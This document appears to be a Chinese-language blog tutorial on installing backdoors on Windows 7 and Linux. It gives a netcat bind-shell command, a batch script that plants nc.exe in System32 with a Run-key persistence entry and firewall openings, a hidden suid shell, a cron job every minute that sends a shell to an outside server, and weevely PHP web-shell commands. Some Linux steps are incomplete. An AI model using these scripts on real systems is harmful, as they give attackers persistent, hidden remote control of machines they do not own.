如何在Windows，Linux中安装后门

0×00 准备工作

假设用户以管理员权限登录系统，在Windows 7系统上使用netcat 创建一个后门。

Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :

1.下载额外的文件和附加持续.

2.编辑修改指定文件.

3.快速创建执行后门.

4.控制远程服务器并进行恶作剧 ：）

为了便于你第一时间获取到你的工具包，你需要将它放置在一个独立的U盘或者在线服务器上。

便携式工具(Portable Applications)

便携式工具是那些不需要安装就能直接使用的程序，它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文件，方便携带。在独立文件执行的过程中会自行释放额的需求文件，并构建一个可顺利执行目标程序的环境。

1.不依赖特定的dll(dll已经打包)

2.不依赖注册表设置(有可能自行初始化) ，不遗留下任何注册表 *** 作痕迹

3. *** 作痕迹最小化，尽量避免一切不必要的 *** 作，导致留下过多的系统 *** 作记录

创建 Windows 7 工具集

gVim (跨平台的文本编辑器, 提供强大的命令行 *** 作交互)

Wget (下载 windows 64 位版本)

Netcat

有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/

0×01初试 Netcat 后门

nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服务并等待客户端连接， 在客户端连接成功之后，会提供相应的交互服务。

– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)

– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)

– d 采取静默监听模式，避免nc运行过程中，产生过多额外的日志信息

Windows 7 后门安装批处理脚本

@echo off

Rem 拷贝文件到系统目录

xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:

\Windows\System32\" -y

Rem 修改注册表，增加后门自启动代码.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t

REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

Rem 添加防火墙规则，开放监听的449端口，允许外部连接.

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow

protocol=UDP localport=449

netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow

protocol=TCP localport=449

Rem 添加防火墙规则，允许nc.exe对外提供连接.

netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow

program="C:\windows\system32\nc.exe"

linux后门

一、前提：已经是root用户，想留一个后门

suid shell

.woot前面的'.'并不是必须的，只是为了隐藏文件( 在文件名的最前面加上“.”，就可以在任意文件目录下进行隐藏) .

chmod 4755——作用，使所有使用.woot文件的用户都具有文件所有者的权限

此时权限并没有改变，因为bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

二、Unix Bash 远控后门

先创建 /etc/xxxx 脚本文件

设置权限 chmod +sx /etc/door

修改一下 /etc/crontab 让它定时执行

nano /etc/crontab    在 /etc/crontab 文件末加入这一行。代表每 1 分钟执行一次。

*/1 * * * * root /etc/xxxx

最后重启一下 crond 的服务。（不同发行版重启方式不一样，自行查询）

service cron reload

service cron start

然后在 x.x.x.x 的服务器上使用nc 接收 Shell 即可。

三、常见的Web后门

weevely——针对php

生成密码为123的后门文件

weevely generate 123 /root/weevely.php

上传到目标服务器，然后远程连接

weevely <目标URL><密码>就能成功连接上了

---